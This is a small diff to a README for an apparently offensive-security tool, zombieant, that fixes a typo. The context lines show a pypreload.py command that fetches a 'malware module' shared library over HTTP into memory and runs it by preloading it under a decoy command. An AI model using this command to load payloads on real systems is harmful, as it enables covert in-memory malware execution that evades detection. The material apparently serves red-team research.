dsnezhkov/zombieant/README.md

 ```sh
 $ pypreload.py  -t so -l http://127.0.0.1:8080/libmctor.so -d bash -c /bin/ls
 ```
-Here, we fetch our malware module into memory, and execute its fucntionality preloading a decoy command, all in memory.
+Here, we fetch our malware module into memory, and execute its functionality preloading a decoy command, all in memory.

 Consider execution context: